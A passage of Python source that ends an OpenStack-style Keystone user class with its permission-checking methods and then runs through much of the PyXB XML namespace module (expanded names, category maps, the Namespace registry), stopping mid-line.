token=self.unscoped_token,
is_federated=self.is_federated)
except (keystone_exceptions.ClientException,
keystone_exceptions.AuthorizationFailure):
LOG.exception('Unable to retrieve project list.')
return self._authorized_tenants or []
@authorized_tenants.setter
def authorized_tenants(self, tenant_list):
self._authorized_tenants = tenant_list
@property
def services_region(self):
return self._services_region
@services_region.setter
def services_region(self, region):
self._services_region = region
@property
def available_services_regions(self):
"""Returns list of unique region name values in service catalog."""
regions = []
if self.service_catalog:
for service in self.service_catalog:
service_type = service.get('type')
if service_type is None or service_type == 'identity':
continue
for endpoint in service.get('endpoints', []):
region = utils.get_endpoint_region(endpoint)
if region not in regions:
regions.append(region)
return regions
def save(*args, **kwargs):
# Presume we can't write to Keystone.
pass
def delete(*args, **kwargs):
# Presume we can't write to Keystone.
pass
# Check for OR'd permission rules, check that user has one of the
# required permission.
def has_a_matching_perm(self, perm_list, obj=None):
"""Returns True if the user has one of the specified permissions.
If object is passed, it checks if the user has any of the required
perms for this object.
"""
# If there are no permissions to check, just return true
if not perm_list:
return True
# Check that user has at least one of the required permissions.
for perm in perm_list:
if self.has_perm(perm, obj):
return True
return False
# Override the default has_perm method. Default implementation allows
# active superusers to have all permissions. Our check is more complicated
# than that, service have to check if is available before a panel can be
# exposed. Removing the superuser check and delegate the check to the
# auth backend.
def has_perm(self, perm, obj=None):
"""Returns True if the user has the specified permission.
This method queries all available auth backends, but returns
immediately if any backend returns True. Thus, a user who has
permission from a single auth backend is assumed to have permission
in general. If an object is provided, permissions for this specific
object are checked.
"""
return models._user_has_perm(self, perm, obj)
# Override the default has_perms method. Allowing for more
# complex combinations of permissions. Will check for logical AND of
# all top level permissions. Will use logical OR for all first level
# tuples (check that use has one permissions in the tuple)
#
# Examples:
# Checks for all required permissions
# ('openstack.roles.admin', 'openstack.roles.L3-support')
#
# Checks for admin AND (L2 or L3)
# ('openstack.roles.admin', ('openstack.roles.L3-support',
# 'openstack.roles.L2-support'),)
def has_perms(self, perm_list, obj=None):
"""Returns True if the user has all of the specified permissions.
Tuples in the list will possess the required permissions if
the user has a permissions matching one of the elements of
that tuple
"""
# If there are no permissions to check, just return true
if not perm_list:
return True
for perm in perm_list:
if isinstance(perm, basestring):
# check that the permission matches
if not self.has_perm(perm, obj):
return False
else:
# check that a permission in the tuple matches
if not self.has_a_matching_perm(perm, obj):
return False
return True
|
|
# -*- coding: utf-8 -*-
# Copyright 2009-2013, Peter A. Bigot
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain a
# copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Classes and global objects related to U{XML Namespaces<http://www.w3.org/TR/2006/REC-xml-names-20060816/index.html>}.
Since namespaces hold all referenceable objects, this module also defines the
infrastructure for resolving named object references, such as schema
components.
"""
import pyxb
import pyxb.utils.utility
from pyxb.utils import six
import xml.dom
import logging
_log = logging.getLogger(__name__)
@pyxb.utils.utility.BackfillComparisons
class ExpandedName (pyxb.cscRoot):
"""Represent an U{expanded name
<http://www.w3.org/TR/REC-xml-names/#dt-expname>}, which pairs a
namespace with a local name.
Because a large number of local elements, and most attributes, have no
namespace associated with them, this is optimized for representing names
with an absent namespace. The hash and equality test methods are set so
that a plain string is equivalent to a tuple of C{None} and that string.
Note that absent namespaces can be represented in two ways: with a
namespace of C{None} (the name "has no namespace"), and with a namespace
that is an L{absent namespace <Namespace.CreateAbsentNamespace>} (the name
"has an absent namespace"). Hash code calculations are done so that the
two alternatives produce the same hash; however, comparison is done so
that the two are distinguished. The latter is the intended behavior; the
former should not be counted upon.
This class allows direct lookup of the named object within a category by
using the category name as an accessor function. That is, if the
namespace of the expanded name C{en} has a category 'typeDefinition', then
the following two expressions are equivalent::
en.typeDefinition()
en.namespace().categoryMap('typeDefinition').get(en.localName())
This class descends from C{tuple} so that its values can be used as
dictionary keys without concern for pointer equivalence.
"""
def namespace (self):
"""The L{Namespace} part of the expanded name."""
return self.__namespace
__namespace = None
def namespaceURI (self):
"""Return the URI of the namespace, or C{None} if the namespace is absent."""
return self.__namespaceURI
__namespaceURI = None
def localName (self):
"""The local part of the expanded name."""
return self.__localName
__localName = None
# Cached tuple representation
__expandedName = None
def validateComponentModel (self):
"""Pass model validation through to namespace part."""
return self.namespace().validateComponentModel()
def uriTuple (self):
"""Return a tuple consisting of the namespace URI and the local name.
This presents the expanded name as base Python types for persistent
storage. Be aware, though, that it will lose the association of the
name with an absent namespace, if that matters to you."""
return ( self.__namespaceURI, self.__localName )
# Treat unrecognized attributes as potential accessor functions
def __getattr__ (self, name):
# Don't try to recognize private names (like __setstate__)
if name.startswith('__'):
return super(ExpandedName, self).__getattr__(name)
ns = self.namespace()
if ns is None:
return lambda: None
# Anything we're going to look stuff up in requires a component model.
# Make sure we have one loaded.
ns.validateComponentModel()
# NOTE: This will raise pyxb.NamespaceError if the category does not exist.
category_value = ns.categoryMap(name).get(self.localName())
return lambda : category_value
def createName (self, local_name):
"""Return a new expanded name in the namespace of this name.
@param local_name: The local name portion of an expanded name.
@return: An instance of L{ExpandedName}.
"""
return ExpandedName(self.namespace(), local_name)
def adoptName (self, name):
"""Return the input name, except if the input name has no namespace,
return a name that uses the namespace from this name with the local
name from the input name.
Use this when the XML document has an unqualified name and we're
processing using an absent default namespace.
@warning: Be careful when using a global name to adopt a name from a
local element: if the local element (with no namespace) has the same
localName as but is different from the global element (with a
namespace), this will improperly provide a namespace when one should
not be present. See the comments in
L{pyxb.binding.basis.element.elementForName}.
"""
if not isinstance(name, ExpandedName):
name = ExpandedName(name)
if name.namespace() is None:
name = self.createName(name.localName())
return name
def __init__ (self, *args, **kw):
"""Create an expanded name.
Expected argument patterns are:
- ( C{str} ) : the local name in an absent namespace
- ( L{ExpandedName} ) : a copy of the given expanded name
- ( C{xml.dom.Node} ) : The name extracted from node.namespaceURI and node.localName
- ( C{str}, C{str} ) : the namespace URI and the local name
- ( L{Namespace}, C{str} ) : the namespace and the local name
- ( L{ExpandedName}, C{str}) : the namespace from the expanded name, and the local name
Wherever C{str} occurs C{unicode} is also permitted.
@keyword fallback_namespace: Optional Namespace instance to use if the
namespace would otherwise be None. This is only used if it is an
absent namespace.
"""
fallback_namespace = kw.get('fallback_namespace')
if 0 == len(args):
raise pyxb.LogicError('Too few arguments to ExpandedName constructor')
if 2 < len(args):
raise pyxb.LogicError('Too many arguments to ExpandedName constructor')
if 2 == len(args):
# Namespace(str, unicode, Namespace) and local name basestring
( ns, ln ) = args
else:
# Local name basestring or ExpandedName or Node
assert 1 == len(args)
ln = args[0]
ns = None
if isinstance(ln, six.string_types):
pass
elif isinstance(ln, tuple) and (2 == len(ln)):
(ns, ln) = ln
elif isinstance(ln, ExpandedName):
ns = ln.namespace()
ln = ln.localName()
elif isinstance(ln, xml.dom.Node):
if not(ln.nodeType in (xml.dom.Node.ELEMENT_NODE, xml.dom.Node.ATTRIBUTE_NODE)):
raise pyxb.LogicError('Cannot create expanded name from non-element DOM node %s' % (ln.nodeType,))
ns = ln.namespaceURI
ln = ln.localName
else:
raise pyxb.LogicError('Unrecognized argument type %s' % (type(ln),))
if (ns is None) and (fallback_namespace is not None):
if fallback_namespace.isAbsentNamespace():
ns = fallback_namespace
if isinstance(ns, six.string_types):
ns = NamespaceForURI(ns, create_if_missing=True)
if isinstance(ns, ExpandedName):
ns = ns.namespace()
if (ns is not None) and not isinstance(ns, Namespace):
raise pyxb.LogicError('ExpandedName must include a valid (perhaps absent) namespace, or None.')
self.__namespace = ns
if self.__namespace is not None:
self.__namespaceURI = self.__namespace.uri()
self.__localName = ln
assert self.__localName is not None
self.__expandedName = ( self.__namespace, self.__localName )
self.__uriTuple = ( self.__namespaceURI, self.__localName )
super(ExpandedName, self).__init__(*args, **kw)
def __str__ (self):
assert self.__localName is not None
if self.__namespaceURI is not None:
return '{%s}%s' % (self.__namespaceURI, self.__localName)
return self.localName()
def __hash__ (self):
if self.__namespaceURI is None:
# Handle both str and unicode hashes
return type(self.__localName).__hash__(self.__localName)
return tuple.__hash__(self.__expandedName)
def __otherForCompare (self, other):
if isinstance(other, six.string_types):
other = ( None, other )
if not isinstance(other, tuple):
other = other.__uriTuple
if isinstance(other[0], Namespace):
other = ( other[0].uri(), other[1] )
return other
def __eq__ (self, other):
if other is None:
return False
return 0 == pyxb.utils.utility.IteratedCompareMixed(self.__uriTuple, self.__otherForCompare(other))
def __lt__ (self, other):
if other is None:
return False
return 0 > pyxb.utils.utility.IteratedCompareMixed(self.__uriTuple, self.__otherForCompare(other))
def getAttribute (self, dom_node):
"""Return the value of the attribute identified by this name in the given node.
@return: An instance of C{xml.dom.Attr}, or C{None} if the node does
not have an attribute with this name.
"""
if dom_node.hasAttributeNS(self.__namespaceURI, self.__localName):
return dom_node.getAttributeNS(self.__namespaceURI, self.__localName)
return None
def nodeMatches (self, dom_node):
"""Return C{True} iff the dom node expanded name matches this expanded name."""
return (dom_node.localName == self.__localName) and (dom_node.namespaceURI == self.__namespaceURI)
class NamedObjectMap (dict):
"""An extended dictionary intended to assist with QName resolution.
These dictionaries have an attribute that identifies a category of named
objects within a Namespace; the specifications for various documents
require that certain groups of objects must be unique, while uniqueness is
not required between groups. The dictionary also retains a pointer to the
Namespace instance for which it holds objects."""
def namespace (self):
"""The namespace to which the object map belongs."""
return self.__namespace
__namespace = None
def category (self):
"""The category of objects (e.g., typeDefinition, elementDeclaration)."""
return self.__category
__category = None
def __init__ (self, category, namespace, *args, **kw):
self.__category = category
self.__namespace = namespace
super(NamedObjectMap, self).__init__(*args, **kw)
class _NamespaceCategory_mixin (pyxb.cscRoot):
"""Mix-in that aggregates those aspects of XMLNamespaces that hold
references to categories of named objects.
Arbitrary groups of named objects, each requiring unique names within
themselves, can be saved. Unless configured otherwise, the Namespace
instance is extended with accessors that provide direct access to
individual category maps. The name of the method is the category name
with a suffix of "s"; e.g., if a category "typeDefinition" exists, it can
be accessed from the namespace using the syntax C{ns.typeDefinitions()}.
Note that the returned value from the accessor is a live reference to
the category map; changes made to the map are reflected in the
namespace.
"""
# Map from category strings to NamedObjectMap instances that
# contain the dictionary for that category.
__categoryMap = None
def _reset (self):
"""CSC extension to reset fields of a Namespace.
This one handles category-related data."""
getattr(super(_NamespaceCategory_mixin, self), '_reset', lambda *args, **kw: None)()
self.__categoryMap = { }
def categories (self):
"""The list of individual categories held in this namespace."""
return list(self.__categoryMap.keys())
def _categoryMap (self):
"""Return the whole map from categories to named objects."""
return self.__categoryMap
def categoryMap (self, category):
"""Map from local names to NamedObjectMap instances for the given category."""
try:
return self.__categoryMap[category]
except KeyError:
raise pyxb.NamespaceError(self, '%s has no category %s' % (self, category))
def __defineCategoryAccessors (self):
"""Define public methods on the Namespace which provide access to
individual NamedObjectMaps based on their category.
"""
for category in self.categories():
accessor_name = category + 's'
setattr(self, accessor_name, lambda _map=self.categoryMap(category): _map)
def configureCategories (self, categories):
"""Ensure there is a map for each of the given categories.
Category configuration
L{activates<archive._NamespaceArchivable_mixin.isActive>} a namespace.
Existing maps are not affected."""
self._activate()
if self.__categoryMap is None:
self.__categoryMap = { }
for category in categories:
if not (category in self.__categoryMap):
self.__categoryMap[category] = NamedObjectMap(category, self)
self.__defineCategoryAccessors()
return self
def addCategoryObject (self, category, local_name, named_object):
"""Allow access to the named_object by looking up the local_name in
the given category.
Raises pyxb.NamespaceUniquenessError if an object with the same name
already exists in the category."""
name_map = self.categoryMap(category)
old_object = name_map.get(local_name)
if (old_object is not None) and (old_object != named_object):
raise pyxb.NamespaceUniquenessError(self, '%s: name %s used for multiple values in %s' % (self, local_name, category))
name_map[local_name] = named_object
return named_object
def replaceCategoryObject (self, category, local_name, old_object, new_object):
"""Replace the referenced object in the category.
The new object will be added only if the old_object matches the
current entry for local_name in the category."""
name_map = self.categoryMap(category)
if old_object == name_map.get(local_name):
name_map[local_name] = new_object
return name_map[local_name]
def _replaceComponent_csc (self, existing_def, replacement_def):
"""Replace a component definition where present in the category maps.
@note: This is a high-cost operation, as every item in every category
map must be examined to see whether its value field matches
C{existing_def}."""
for (cat, registry) in six.iteritems(self.__categoryMap):
for (k, v) in registry.items(): # NB: Not iteritems
if v == existing_def:
del registry[k]
if replacement_def is not None:
registry[k] = replacement_def
return getattr(super(_NamespaceCategory_mixin, self), '_replaceComponent_csc', lambda *args, **kw: replacement_def)(existing_def, replacement_def)
# Verify that the namespace category map has no components recorded. This
# is the state that should hold prior to loading a saved namespace; at
# tthe moment, we do not support aggregating components defined separately
# into the same namespace. That should be done at the schema level using
# the "include" element.
def __checkCategoriesEmpty (self):
if self.__categoryMap is None:
return True
assert isinstance(self.__categoryMap, dict)
if 0 == len(self.__categoryMap):
return True
for k in self.categories():
if 0 < len(self.categoryMap(k)):
return False
return True
def _namedObjects (self):
objects = set()
for category_map in six.itervalues(self.__categoryMap):
objects.update(six.itervalues(category_map))
return objects
def _loadNamedObjects (self, category_map):
"""Add the named objects from the given map into the set held by this namespace.
It is an error to name something which is already present."""
self.configureCategories(six.iterkeys(category_map))
for category in six.iterkeys(category_map):
current_map = self.categoryMap(category)
new_map = category_map[category]
for (local_name, component) in six.iteritems(new_map):
existing_component = current_map.get(local_name)
if existing_component is None:
current_map[local_name] = component
elif existing_component._allowUpdateFromOther(component):
existing_component._updateFromOther(component)
else:
raise pyxb.NamespaceError(self, 'Load attempted to override %s %s in %s' % (category, local_name, self.uri()))
self.__defineCategoryAccessors()
def hasSchemaComponents (self):
"""Return C{True} iff schema components have been associated with this namespace.
This only checks whether the corresponding categories have been added,
not whether there are any entries in those categories. It is useful
for identifying namespaces that were incorporated through a
declaration but never actually referenced."""
return 'typeDefinition' in self.__categoryMap
def _associateOrigins (self, module_record):
"""Add links from L{pyxb.namespace.archive._ObjectOrigin} instances.
For any resolvable item in this namespace from an origin managed by
the module_record, ensure that item can be found via a lookup through
that origin.
This allows these items to be found when a single namespace comprises
items translated from different schema at different times using
archives to maintain consistency."""
assert module_record.namespace() == self
module_record.resetCategoryObjects()
self.configureCategories([archive.NamespaceArchive._AnonymousCategory()])
origin_set = module_record.origins()
for (cat, cat_map) in six.iteritems(self.__categoryMap):
for (n, v) in six.iteritems(cat_map):
if isinstance(v, archive._ArchivableObject_mixin) and (v._objectOrigin() in origin_set):
v._objectOrigin().addCategoryMember(cat, n, v)
class _ComponentDependency_mixin (pyxb.utils.utility.PrivateTransient_mixin, pyxb.cscRoot):
"""Mix-in for components that can depend on other components."""
__PrivateTransient = set()
# Cached frozenset of components on which this component depends.
__bindingRequires = None
__PrivateTransient.add('bindingRequires')
def _resetClone_csc (self, **kw):
"""CSC extension to reset fields of a component. This one clears
dependency-related data, since the clone will have to revise its
dependencies.
@rtype: C{None}"""
getattr(super(_ComponentDependency_mixin, self), '_resetClone_csc', lambda *_args, **_kw: None)(**kw)
self.__bindingRequires = None
def bindingRequires (self, reset=False, include_lax=False):
"""Return a set of components upon whose bindings this component's
bindings depend.
For example, bindings that are extensions or restrictions depend on
their base types. Complex type definition bindings require that the
types of their attribute declarations be available at the class
definition, and the types of their element declarations in the
postscript.
@keyword include_lax: if C{False} (default), only the requirements of
the class itself are returned. If C{True}, all requirements are
returned.
@rtype: C{set(L{pyxb.xmlschema.structures._SchemaComponent_mixin})}
"""
if reset or (self.__bindingRequires is None):
if isinstance(self, resolution._Resolvable_mixin) and not (self.isResolved()):
raise pyxb.LogicError('Unresolved %s in %s: %s' % (self.__class__.__name__, self._namespaceContext().targetNamespace(), self.name()))
self.__bindingRequires = self._bindingRequires_vx(include_lax)
return self.__bindingRequires
def _bindingRequires_vx (self, include_lax):
"""Placeholder for subclass method that identifies the necessary components.
@note: Override in subclasses.
@return: The component instances on which this component depends
@rtype: C{frozenset}
@raise LogicError: A subclass failed to implement this method
"""
raise pyxb.LogicError('%s does not implement _bindingRequires_vx' % (type(self),))
class _NamespaceComponentAssociation_mixin (pyxb.cscRoot):
"""Mix-in for managing components defined within this namespace.
The component set includes not only top-level named components (such as
those accessible through category maps), but internal anonymous
components, such as those involved in representing the content model of a
complex type definition. We need to be able to get a list of these
components, sorted in dependency order, so that generated bindings do not
attempt to refer to a binding that has not yet been generated."""
# A set containing all components, named or unnamed, that belong to this
# namespace.
__components = None
def _reset (self):
"""CSC extension to reset fields of a Namespace.
This one handles data related to component association with a
namespace."""
getattr(super(_NamespaceComponentAssociation_mixin, self), '_reset', lambda *args, **kw: None)()
self.__components = set()
self.__origins = set()
self.__schemaMap = { }
def _associateComponent (self, component):
"""Record that the responsibility for the component belongs to this namespace."""
self._activate()
assert self.__components is not None
assert isinstance(component, _ComponentDependency_mixin)
assert component not in self.__components
self.__components.add(component)
def _replaceComponent_csc (self, existing_def, replacement_def):
"""Replace a component definition in the set of associated components.
@raise KeyError: C{existing_def} is not in the set of components."""
self.__components.remove(existing_def)
if replacement_def is not None:
self.__components.add(replacement_def)
return getattr(super(_NamespaceComponentAssociation_mixin, self), '_replaceComponent_csc', lambda *args, **kw: replacement_def)(existing_def, replacement_def)
def addSchema (self, schema):
for sr in self.__origins:
if isinstance(sr, archive._SchemaOrigin) and sr.match(schema=schema):
_log.info('Hash for %s matches %s already registered as %s', schema.location(), sr.schema().location(), self)
raise pyxb.SchemaUniquenessError(self, schema.location(), sr.schema())
sr = archive._SchemaOrigin(schema=schema)
schema.generationUID().associateObject(sr)
self.__origins.add(sr)
return sr
def lookupSchemaByLocation (self, schema_location):
for sr in self.__origins:
if isinstance(sr, archive._SchemaOrigin) and sr.match(location=schema_location):
return (True, sr.schema())
for mr in self.moduleRecords():
if mr.hasMatchingOrigin(location=schema_location):
return (True, None)
return (False, None)
def schemas (self):
s = set()
for sr in self.__origins:
if isinstance(sr, archive._SchemaOrigin) and (sr.schema() is not None):
s.add(sr.schema())
return s
__origins = None
def components (self):
"""Return a frozenset of all components, named or unnamed, belonging
to this namespace."""
return frozenset(self.__components)
def _releaseNamespaceContexts (self):
for c in self.__components:
c._clearNamespaceContext()
from pyxb.namespace import archive
from pyxb.namespace.utility import NamespaceInstance
from pyxb.namespace.utility import NamespaceForURI
from pyxb.namespace.utility import CreateAbsentNamespace
from pyxb.namespace.utility import AvailableNamespaces
from pyxb.namespace import resolution
NamespaceContext = resolution.NamespaceContext
class Namespace (_NamespaceCategory_mixin, resolution._NamespaceResolution_mixin, _NamespaceComponentAssociation_mixin, archive._NamespaceArchivable_mixin):
"""Represents an XML namespace (a URI).
There is at most one L{Namespace} class instance per namespace (URI). The
instance also supports associating arbitrary L{maps<NamedObjectMap>} from
names to objects, in separate categories. The default categories are
configured externally; for example, the
L{Schema<pyxb.xmlschema.structures.Schema>} component defines a category
for each named component in XMLSchema, and the customizing subclass for
WSDL definitions adds categories for the service bindings, messages, etc.
Namespaces can be written to and loaded from pickled files. See
L{NamespaceArchive} for information.
"""
# The URI for the namespace. If the URI is None, this is an absent
# namespace.
__uri = None
# An identifier, unique within a program using PyXB, used to distinguish
# absent namespaces. Currently this value is not accessible to the user,
# and exists solely to provide a unique identifier when printing the
# namespace as a string. The class variable is used as a one-up counter,
# which is assigned to the instance variable when an absent namespace
# instance is created.
__absentNamespaceID = 0
# A prefix bound to this namespace by standard. Current set known are applies to
# xml and xmlns.
__boundPrefix = None
# A prefix set as a preferred prefix, generally by processing a namespace
# declaration.
__prefix = None
# A map from URIs to Namespace instances. Namespaces instances
# must be unique for their URI. See __new__().
__Registry = { }
# A set of all absent namespaces created.
__AbsentNamespaces = set()
# Optional description of the namespace
__description = None
# Indicates whether this namespace is built-in to the system
__isBuiltinNamespace = False
# Indicates whether this namespace is undeclared (available always)
__isUndeclaredNamespace = False
# Indicates whether this namespace was loaded from an archive
__isLoadedNamespace = False
# Archive from which the namespace can be read, or None if no archive
# defines this namespace.
__namespaceArchive = None
# Indicates whether this namespace has been written to an archive
__hasBeenArchived = False
# Holds the module path for builtin modules until we get a ModuleRecord to
# store that in.
__builtinModulePath = None
# A set of options defining how the Python bindings for this namespace
# were generated. Not currently used, since we don't have different
# binding configurations yet.
__bindingConfiguration = None
# The namespace to use as the default namespace when constructing the
# The namespace context used when creating built-in components that belong
# to this namespace. This is used to satisfy the low-level requirement
# that all schema components have a namespace context; normally, that
# context is built dynamically from the schema element.
__initialNamespaceContext = None
# The default_namespace parameter when creating the initial namespace
# context. Only used with built-in namespaces.
__contextDefaultNamespace = None
# The map from prefixes to namespaces as defined by the schema element for
# this namespace. Only used with built-in namespaces.
__contextInScopeNamespaces = None
@classmethod
def _NamespaceForURI (cls, uri):
"""If a Namespace instance for the given URI exists, return it; otherwise return None.
Note: Absent namespaces are not stored in the registry. If you use
one (e.g., for a schema with no target namespace), don't lose hold of
it."""
if uri is None:
raise pyxb.UsageError('Absent namespaces are unlocatable')
return cls.__Registry.get(uri)
# A map from string UUIDs to absent Namespace instances. Used for
# in-session deserialization as required for cloning objects. Non-absent
# namespaces are identified by URI and recorded in __Registry.
__AbsentNamespaceRegistry = { }
# The UUID used to serialize this namespace. This serves the same role in
# __AbsentNamespaceRegistry as the namespace URI does in __Registry, but
# is retained only within a single PyXB session.
__absentSerializedUUID = None
__SerializedVariantAbsent = 'absent'
def __getnewargs__ (self):
"""Pickling support.
To ensure that unpickled Namespace instances are unique per
URI, we ensure that the routine that creates unpickled
instances knows what it's supposed to return."""
if self.uri() is None:
# We can't reconstruct absent namespaces. However, it is
# convenient to be able to use Python's copy module to clone
# instances. Support for that does require ability to identify
# specific absent namespaces, which we do by representing them as
# a tuple containing a variant tag and unique identifier.
if self.__absentSerializedUUID is None:
_log.warning('Instances with absent namespaces can only be reconstructed in-session')
self.__absentSerializedUUID = pyxb.utils.utility.UniqueIdentifier()
self.__AbsentNamespaceRegistry[self.__absentSerializedUUID.uid()] = self
return ((self.__SerializedVariantAbsent, self.__absentSerializedUUID.uid()),)
return (self.uri(),)
def __new__ (cls, *args, **kw):
"""Pickling and singleton support.
This ensures that no more than one Namespace instance exists
for any given URI. We could do this up in __init__, but that
doesn't normally get called when unpickling instances; this
does. See also __getnewargs__()."""
(uri,) = args
if isinstance(uri, tuple):
# Special handling to reconstruct absent namespaces.
(variant, uid) = uri
if cls.__SerializedVariantAbsent == variant:
ns = cls.__AbsentNamespaceRegistry.get(uid)
if ns is None:
raise pyxb.UsageError('Unable to reconstruct instance of absent namespace')
return ns
raise pyxb.LogicError('Unrecognized serialized namespace variant %s uid %s' % (variant, uid))
elif not (uri in cls.__Registry):
instance = object.__new__(cls)
# Do this one step of __init__ so we can do checks during unpickling
instance.__uri = uri
instance._reset()
# Absent namespaces are not stored in the registry.
if uri is None:
cls.__AbsentNamespaces.add(instance)
return instance
cls.__Registry[uri] = instance
return cls.__Registry[uri]
@classmethod
def AvailableNamespaces (cls):
"""Return a set of all Namespace instances defined so far."""
return cls.__AbsentNamespaces.union(six.itervalues(cls.__Registry))
def __init__ (self, uri,
description=None,
builtin_namespace=None,
builtin_module_path=None,
is_undeclared_namespace=False,
is_loaded_namespace=False,
bound_prefix=None,
default_namespace=None,
in_scope_namespaces=None):
"""Create a new Namespace.
The URI must be non-None, and must not already be assigned to
a Namespace instance. See _NamespaceForURI().
User-created Namespace instances may also provide a description.
Users should never provide a builtin_namespace parameter.
"""
# New-style superclass invocation
super(Namespace, self).__init__()
self.__contextDefaultNamespace = default_namespace
self.__contextInScopeNamespaces = in_scope_namespaces
# Make sure that we're not trying to do something restricted to
# built-in namespaces
is_builtin_namespace = not (builtin_namespace is None)
if not is_builtin_namespace:
if bound_prefix is not None:
raise pyxb.LogicError('Only permanent Namespaces may have bound prefixes')
# We actually set the uri when this instance was allocated;
# see __new__().
assert self.__uri == uri
self.__boundPrefix = bound_prefix
self.__description = description
self.__isBuiltinNamespace = is_builtin_namespace
self.__builtinNamespaceVariable = builtin_namespace
self.__builtinModulePath = builtin_module_path
self.__isUndeclaredNamespace = is_undeclared_namespace
self.__isLoadedNamespace = is_loaded_namespace
self._reset()
assert (self.__uri is None) or (self.__Registry[self.__uri] == self)
def _reset (self):
assert not self.isActive()
getattr(super(Namespace, self), '_reset', lambda *args, **kw: None)()
self.__initialNamespaceContext = None
def uri (self):
"""Return the URI for the namespace represented by this instance.
If the URI is None, this is an absent namespace, used to hold
declarations not associated with a namespace (e.g., from schema with
no target namespace)."""
return self.__uri
def setPrefix (self, prefix):
if self.__boundPrefix is not None:
if self.__boundPrefix == prefix:
return self
raise pyxb.NamespaceError(self, 'Cannot change the prefix of a bound namespace')
if (None is not prefix) and (0 == len(prefix)):
raise pyxb.UsageError('prefix must be non-empty string')
self.__prefix = prefix
return self
def prefix (self):
if self.__boundPrefix:
return self.__boundPrefix
return self.__prefix
def isAbsentNamespace (self):
"""Return True iff this namespace is an absent namespace.
Absent namespaces have no namespace URI; they exist only to
hold components created from schemas with no target
namespace."""
return self.__uri is None
def fallbackNamespace (self):
"""When known to be operating in this namespace, provide the Namespace
instance to be used when names are associated with no namespace."""
if self.isAbsentNamespace():
return self
return None
@classmethod
def CreateAbsentNamespace (cls):
"""Create an absent namespace.
Use this instead of the standard constructor, in case we need
to augment it with a uuid or the like."""
rv = Namespace(None)
rv.__absentNamespaceID = cls.__absentNamespaceID
cls.__absentNamespaceID += 1
return rv
def _overrideAbsentNamespace (self, uri):
assert self.isAbsentNamespace()
self.__uri = uri
def boundPrefix (self):
"""Return the standard prefix to be used for this namespace.
Only a few namespace prefixes are bound to namespaces: xml and xmlns
are two. In all other cases, this method should return None. The
infrastructure attempts to prevent user creation of Namespace
instances that have bound prefixes."""
return self.__boundPrefix
def isBuiltinNamespace (self):
"""Return True iff this namespace was defined by the infrastructure.
That is the case for all namespaces in the Namespace module."""
return self.__isBuiltinNamespace
def builtinNamespaceRepresentation (self):
assert self.__builtinNamespaceVariable is not None
return 'pyxb.namespace.%s' % (self.__builtinNamespaceVariable,)
def builtinModulePath (self):
from pyxb.namespace import builtin
if not self.__builtinModulePath:
raise pyxb.LogicError('Namespace has no built-in module: %s' % (self,))
mr = self.lookupModuleRecordByUID(builtin.BuiltInObjectUID)
assert mr is not None
assert mr.modulePath() == self.__builtinModulePath
return self.__builtinModulePath
def isUndeclaredNamespace (self):
"""Return True iff this namespace is always available
regardless of whether there is a declaration for it.
This is the case only for the
xml(http://www.w3.org/XML/1998/namespace) and
xmlns(http://www.w3.org/2000/xmlns/) namespaces."""
return self.__isUndeclaredNamespace
def isLoadedNamespace (self):
"""Return C{True} iff this namespace was loaded from a namespace archive."""
return self.__isLoadedNamespace
def hasBeenArchived (self):
"""Return C{True} iff this namespace has been saved to a namespace archive.
See also L{isLoadedNamespace}."""
return self.__hasBeenArchived
def description (self, description=None):
"""Get, or set, a textual description of the namespace."""
if description is not None:
self.__description = description
return self.__description
def nodeIsNamed (self, node, *local_names):
return (node.namespaceURI == self.uri()) and (node.localName in local_names)
def createExpandedName (self, local_name):
return ExpandedName(self, local_name)
def __getstate__ (self):
"""Support pickling.
Well, no, not really. Because namespace instances must be unique, we
represent them as their URI, and that's done by __getnewargs__
above. All the interesting information is in the ModuleRecords."""
return {}
def _defineBuiltins_ox (self, structures_module):
pass
__definedBuiltins = False
def _defineBuiltins (self, structures_module):
assert self.isBuiltinNamespace()
if not self.__definedBuiltins:
from pyxb.namespace import builtin
mr = self.lookupModuleRecordByUID(builtin.BuiltInObjectUID, create_if_missing=True, module_path=self.__builtinModulePath)
self._defineBuiltins_ox(structures_module)
self.__definedBuiltins = True
mr.markIncorporated()
return self
def _loadComponentsFromArchives (self, structures_module):
"""Attempts to load the named objects held in this namespace.
The base class implementation looks at the set of available archived
namespaces, and if one contains this namespace unserializes its named
object maps.
Sub-classes may choose to look elsewhere, if this version fails or
before attempting it.
There is no guarantee that any particular category of named object has
been located when this returns. Caller must check.
"""
for mr in self.moduleRecords():
if mr.isLoadable():
if mr.isPublic():
_log.info('Load %s from %s', mr, mr.archive())
try:
mr.archive().readNamespaces()
except pyxb.NamespaceArchiveError:
_log.exception("Failure reading namespaces in archive")
else:
_log.info('Ignoring private module %s in validation', mr)
self._activate()
__didValidation = False
__inValidation = False
def validateComponentModel (self, structures_module=None):
"""Ensure this namespace is ready for use.
If the namespace does not have a map of named objects, the system will
attempt to load one.
"""
if not self.__didValidation:
# assert not self.__inValidation, 'Nested validation of %s' % (self.uri(),)
if structures_module is None:
import pyxb.xmlschema.structures as structures_module
if self.isBuiltinNamespace():
self._defineBuiltins(structures_module)
try:
self.__inValidation = True
self._loadComponentsFromArchives(structures_module)
self.__didValidation = True
finally:
self.__inValidation = False
return True
def _replaceComponent (self, existing_def, replacement_def):
"""Replace the existing definition with another.
This is used in a situation where building the component model
resulted in a new component instance being created and registered, but
for which an existing component is to be preferred. An example is
when parsing the schema for XMLSchema itself: the built-in datatype
components should be retained instead of the simple type definition
components dynamically created from the schema.
By providing the value C{None} as the replacement definition, this can
also be used to remove components.
@note: Invoking this requires scans of every item in every category
map in the namespace.
@return: C{replacement_def}
"""
# We need to do replacements in the category map handler, the
# resolver, and the component associator.
return self._replaceComponent_csc(existing_def, replacement_def)
def initialNamespaceContext (self):
"""Obtain the namespace context to be used when creating components in this namespace.
Usually applies only to built-in namespaces, but is also used in the
autotests when creating a namespace without a xs:schema element. .
Note that we must create the instance dynamically, since the
information that goes into it has cross-dependencies that can't be
resolved until this module has been completely loaded."""
if self.__initialNamespaceContext is None:
isn = { }
if self.__contextInScopeNamespaces is not None:
for (k, v) in six.iteritems(self.__contextInScopeNamespaces):
isn[k] = self.__identifyNamespace(v)
kw = { 'target_namespace' : self
